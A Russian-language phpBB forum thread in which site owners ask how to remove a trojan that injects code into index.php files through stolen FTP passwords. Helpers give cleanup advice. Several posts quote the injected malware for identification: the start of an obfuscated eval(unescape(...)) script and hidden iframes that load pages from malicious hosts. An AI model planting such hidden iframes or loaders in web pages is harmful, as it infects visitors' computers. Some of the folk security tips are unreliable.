Как убить Трояна?
Правила форума
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения
Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение
).
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения
Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение

-
- phpBB 1.2.1
- Сообщения: 22
- Стаж: 18 лет 7 месяцев
- Благодарил (а): 1 раз
Как убить Трояна?
обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh
Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?
Спасибо.
ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.
http://virusinfo.info/pravila.html
Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?
Спасибо.
ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.
http://virusinfo.info/pravila.html
-
- phpBB 1.4.4
- Сообщения: 112
- Стаж: 18 лет 1 месяц
- Откуда: Елец
-
- Former team member
- Сообщения: 9683
- Стаж: 18 лет 11 месяцев
- Откуда: Питер
- Благодарил (а): 1 раз
- Поблагодарили: 27 раз
Re: Форум лег, появились "кракозяблики"
Prosvetlenie
Рекомендую провериться на наличие в коде файлов "левых" включений кода.
Рекомендую провериться на наличие в коде файлов "левых" включений кода.
Не все то WINDOWS, что висит... phpBB только учусь.
ICQ, email, ЛС - только для личных сообщений. Вопросы по phpbb только на форумах. По найму не работаю.
ICQ, email, ЛС - только для личных сообщений. Вопросы по phpbb только на форумах. По найму не работаю.
-
- phpBB 1.0.0
- Сообщения: 5
- Стаж: 17 лет 2 месяца
Re: Форум лег, появились "кракозяблики"
У меня была такая дрянь. Вирус. В конце почти каждого файла была строка типа <?php echo iframe......?>. Вылечил восстановлением из резервной копии.
-
- phpBB 1.0.0
- Сообщения: 4
- Стаж: 17 лет 4 месяца
- Откуда: Украина, Киев
Re: Форум лег, появились "кракозяблики"
Спасибо всем ) буду лечить
Вчера - это история. Завтра - тайна. Настоящее - это дар. Жизнь есть волшебство, и вкус каждого момента неповторим
Психологическое консультирование и тренинги (Киев) - http://www.metapsy.org.ua/
Психологическое консультирование и тренинги (Киев) - http://www.metapsy.org.ua/
-
- phpBB 1.0.0
- Сообщения: 4
- Стаж: 17 лет 4 месяца
- Откуда: Украина, Киев
Re: Форум лег, появились "кракозяблики"
Дело решил так: в корневой папке форума во всех пхп файлах в конце кода добавился код вируса... начинался он так: и так далее.... довольно большой кусок... Удалил, и все работает
Всем кто помогал - спасибо!
Код: Выделить всё
<!-- [ 75e2d43649934e330eb179ccbf91445a ] --><script>eval(unescape('function%20gGYuu%28hAI%29%7Bfunction%20oJHWp%28hEIh%29%7Bvar%20tXXEPU%3D0%3Bvar%20hReZ%3

Вчера - это история. Завтра - тайна. Настоящее - это дар. Жизнь есть волшебство, и вкус каждого момента неповторим
Психологическое консультирование и тренинги (Киев) - http://www.metapsy.org.ua/
Психологическое консультирование и тренинги (Киев) - http://www.metapsy.org.ua/
-
- Former team member
- Сообщения: 1008
- Стаж: 18 лет 9 месяцев
- Откуда: Кишинёв
- Благодарил (а): 1 раз
Re: Как убить Трояна?
Prosvetlenie
обязательно поменяйте пароли к фтп. иначе через недельку вирус сново постучится).
И не держите пароли в фтп клиенте.
обязательно поменяйте пароли к фтп. иначе через недельку вирус сново постучится).
И не держите пароли в фтп клиенте.
-
- phpBB 1.4.4
- Сообщения: 156
- Стаж: 20 лет 10 месяцев
Re: Как убить Трояна?
Та же самая фигня 
В конце файлов index.php и index.htm добавляется код
Код вычищаю, пароль на фтп не менял, сегодня сменю.
Но может кто-нибудь в курсе, что за вирус таким занимается, и где он, на моём компе сидит?
Стоит антивирь norton antivirus, что-то ничего не находит..

В конце файлов index.php и index.htm добавляется код
Посмотрел в панели управления в логах авторизации - там по фтп куча авторизаций с разны ип, точно не моих.<?php echo '<div style="visibility:hidden"><iframe src="http://gfdsgf333.com/in.cgi?27" width=100 height=80></iframe></div>'; ?>
Код вычищаю, пароль на фтп не менял, сегодня сменю.
Но может кто-нибудь в курсе, что за вирус таким занимается, и где он, на моём компе сидит?
Стоит антивирь norton antivirus, что-то ничего не находит..

-
- Former team member
- Сообщения: 2616
- Стаж: 19 лет 8 месяцев
- Откуда: Новосибирск
- Поблагодарили: 3 раза
Re: Как убить Трояна?
DJ Sample
поставьте еще какой-нибудь антивирус, обязательно смените ВСЕ пароли и проверьте сайт на наличие левых файлов.
А троянов, которые крадут пароли, существует сотни.
поставьте еще какой-нибудь антивирус, обязательно смените ВСЕ пароли и проверьте сайт на наличие левых файлов.
А троянов, которые крадут пароли, существует сотни.
Самая страшная ошибка, это ошибка без видимых причин и конкретных последствий.
phpBB3 [db_update.php generator]
Первая помощь по всем phpBB-вопросам: phpBB2 и phpBB3 FAQ; Правила общения;
Все консультации в icq или личке - на платной основе.
phpBB3 [db_update.php generator]
Первая помощь по всем phpBB-вопросам: phpBB2 и phpBB3 FAQ; Правила общения;
Все консультации в icq или личке - на платной основе.
Re: Как убить Трояна?
Блин, ну что за люди! Я же писал : поставьте CHMOD444 на все файлы index и ВСЁ!!! У меня с тех пор НИ РАЗУ не было этих троянов! З.Ы. Я, в отличии от Касперского, денег не беру! 

Phpbb 3.3.11
-
- Former team member
- Сообщения: 1008
- Стаж: 18 лет 9 месяцев
- Откуда: Кишинёв
- Благодарил (а): 1 раз
Re: Как убить Трояна?
я так работаю .. вирус ворует пароли от фтп. Через коммандеры. В коммандере когда пишем пароль , указываем в нем на один лишний символ больше, к примеру в конце пароля.. Пароль запоминается и воруется трояном. Но он не верный.
При последующем соединении, соответственно пишет что неверный пароль, жмем на заново ввести пароль и просто трем последний символ , стираем бэкспейсом. Все тут же коннектится.
Вирус в таком случае бессильный. Не надо менять атрибуты доступа к файлам, отпадают ухищрения и т.д.
Все довольно просто. ИМХО.
Пока за месяцев 10 ни разу проблем не возникло...
Добавлено спустя 2 минуты 7 секунд:
Добавлю, перед этим нужно вычистить все файлы от вредоносного кода. А потом вполне то.
При последующем соединении, соответственно пишет что неверный пароль, жмем на заново ввести пароль и просто трем последний символ , стираем бэкспейсом. Все тут же коннектится.
Вирус в таком случае бессильный. Не надо менять атрибуты доступа к файлам, отпадают ухищрения и т.д.
Все довольно просто. ИМХО.
Пока за месяцев 10 ни разу проблем не возникло...
Добавлено спустя 2 минуты 7 секунд:
Добавлю, перед этим нужно вычистить все файлы от вредоносного кода. А потом вполне то.
-
- Former team member
- Сообщения: 2616
- Стаж: 19 лет 8 месяцев
- Откуда: Новосибирск
- Поблагодарили: 3 раза
Re: Как убить Трояна?
Давайте еще и я выпендрюсь. У меня стоит Linux, под него трояны не пишут и я могу хранить пароли где угодно. Но это еще не все. Файл с паролями у меня шифруется алгоритмом GPG, 1024-битным ключом. Ни разу за всю жизнь никто не спер у меня пароля.
А если серьезно, то просто не храните пароли в стандартным хранилищах. Трояны тупые и даже незашифрованный файлик где-нибудь в моих документах не найдут, если вы, конечно, не назовете его passwords.txt. А еще лучше просто помнить самые важные пароли и не записывать нигде.
А если серьезно, то просто не храните пароли в стандартным хранилищах. Трояны тупые и даже незашифрованный файлик где-нибудь в моих документах не найдут, если вы, конечно, не назовете его passwords.txt. А еще лучше просто помнить самые важные пароли и не записывать нигде.
Самая страшная ошибка, это ошибка без видимых причин и конкретных последствий.
phpBB3 [db_update.php generator]
Первая помощь по всем phpBB-вопросам: phpBB2 и phpBB3 FAQ; Правила общения;
Все консультации в icq или личке - на платной основе.
phpBB3 [db_update.php generator]
Первая помощь по всем phpBB-вопросам: phpBB2 и phpBB3 FAQ; Правила общения;
Все консультации в icq или личке - на платной основе.
-
- Former team member
- Сообщения: 1935
- Стаж: 17 лет 10 месяцев
- Откуда: Саранск
- Поблагодарили: 3 раза
Re: Как убить Трояна?
Alek$, зачет
У меня тож линукс, до сих пор ни одного инцидента не было

У меня тож линукс, до сих пор ни одного инцидента не было

//
// Okay, let's do the loop, yeah come on baby let's do the loop
// and it goes like this ...
| phpBB Adept ] | Каталог форумов | генератор sitemap для форумов | форум про форумы
// Okay, let's do the loop, yeah come on baby let's do the loop
// and it goes like this ...
| phpBB Adept ] | Каталог форумов | генератор sitemap для форумов | форум про форумы
-
- phpBB 1.0.0
- Сообщения: 4
- Стаж: 16 лет 7 месяцев
Re: Как убить Трояна?
Вредоносный фрейм:
Будет добавлен в сегодняшнее обновление каспера.
Код: Выделить всё
<iframe src="http://liteto***catesite.cn/in.cgi?cocacola2" width=1 height=1 style="visibility: hidden"></iframe>
-
- Former team member
- Сообщения: 2616
- Стаж: 19 лет 8 месяцев
- Откуда: Новосибирск
- Поблагодарили: 3 раза
Re: Как убить Трояна?
От греха подальше "побил" ссылку.
Самая страшная ошибка, это ошибка без видимых причин и конкретных последствий.
phpBB3 [db_update.php generator]
Первая помощь по всем phpBB-вопросам: phpBB2 и phpBB3 FAQ; Правила общения;
Все консультации в icq или личке - на платной основе.
phpBB3 [db_update.php generator]
Первая помощь по всем phpBB-вопросам: phpBB2 и phpBB3 FAQ; Правила общения;
Все консультации в icq или личке - на платной основе.
-
- Former team member
- Сообщения: 1935
- Стаж: 17 лет 10 месяцев
- Откуда: Саранск
- Поблагодарили: 3 раза
Re: Как убить Трояна?
Кстати хакеры сейчас прочитают и кончится халяваDK7 писал(а):В коммандере когда пишем пароль , указываем в нем на один лишний символ больше, к примеру в конце пароля..

//
// Okay, let's do the loop, yeah come on baby let's do the loop
// and it goes like this ...
| phpBB Adept ] | Каталог форумов | генератор sitemap для форумов | форум про форумы
// Okay, let's do the loop, yeah come on baby let's do the loop
// and it goes like this ...
| phpBB Adept ] | Каталог форумов | генератор sitemap для форумов | форум про форумы